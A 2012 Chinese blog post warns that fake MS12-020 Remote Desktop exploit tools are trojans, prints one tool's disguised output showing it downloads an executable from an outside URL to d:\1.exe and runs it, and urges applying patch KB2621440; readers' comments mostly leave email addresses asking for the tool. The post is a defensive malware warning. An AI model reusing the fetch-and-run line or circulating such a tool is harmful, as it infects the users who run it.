博爱老头的草屋

好奇害死猫 跟着起哄MS12-020的0Day 小心被驴

2012 年 03 月 17 日 下午 10:30 | | 阅读次数 : 5,223 次 | IT&时事 | , , ,

Please Note: This post is over a year old, any information within it may be out-of-date.

这几天都在关注着MS12-020的漏洞,就连不知道这是什么东西的人也来试一把,就像是在赶新潮,但是要小心了,这种好奇心可能也会使你成为别人的肉鸡,已经有几个朋友中招了。

先看一下他们的运行结果:

Usage : MS12-020 [IP] [Command]
MS12-020 EXP : Parameter error. on port 3389…
MS12-020 EXP : Connecting to on port 3389…
MS12-020 EXP : Connecting to on port 3389…
MS12-020 EXP : Connecting to on port 3389…
MS12-020 EXP : Connecting to
MS12-020 EXP : Command succeed !
MS12-020 EXP : Have a good time. d:\1.exe http://lib.gxufe.cn/data/calc.exe d:\1.exe ios_base::eofbit set ios_base::failbit set

很显然了,它将在网上下载一个文件来执行!!!!上面的打印信息是伪装的,很容易就制作出来了。

作为一个负责人的黑客,是不会轻易的将这么严重漏洞攻击的EXP工具放出来的,要知道这将引起多大的风波?!可以说,现在依然有很多服务器处在0day下!赶紧打KB2621440 的补丁吧!!!http://url.cn/4SH6Q7

现在网上流行的python和ruby的测试Proc也仅仅是对内存片的操作,并不会远程执行其他的代码,造成机器蓝屏、重启。

最后提醒一下,在下载运行这些东西之前,还是要小心+小心啊!

这些东西就不在这里发布了,想要的可以在楼下留言。

Share

11 Comments

  1. Lee 说道:
    2012 年 04 月 11 日 下午 8:05

    这么高深。做了几年MS家的应用开发,我已经什么都不懂了。

    回复
  2. LeanBody 说道:
    2012 年 04 月 03 日 上午 12:39

    jinseok123@gmail.com Thank you~

    回复
  3. ixwebhosting 说道:
    2012 年 03 月 27 日 下午 4:00

    来看看,好象很强大的

    回复
  4. dsdfsd 说道:
    2012 年 03 月 23 日 上午 11:59

    有EXE的吗?

    回复
  5. goodday 说道:
    2012 年 03 月 19 日 上午 11:31

    gogodayday123@gmail.com :eek: 谢谢

    回复
  6. WebSafe 说道:
    2012 年 03 月 18 日 上午 2:13

    2458754109@qq.com 感谢博主!

    回复
  7. msaabc 说道:
    2012 年 03 月 18 日 上午 12:16

    msaabc@gmail.com 谢谢

    回复

Leave a Reply

Your email address is never published nor shared. Required fields are marked with a *.

验证图片

(必填)

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

注意: 评论者允许使用'@user空格'的方式将自己的评论通知另外评论者。例如, ABC是本文的评论者之一,则使用'@ABC '(不包括单引号)将会自动将您的评论发送给ABC。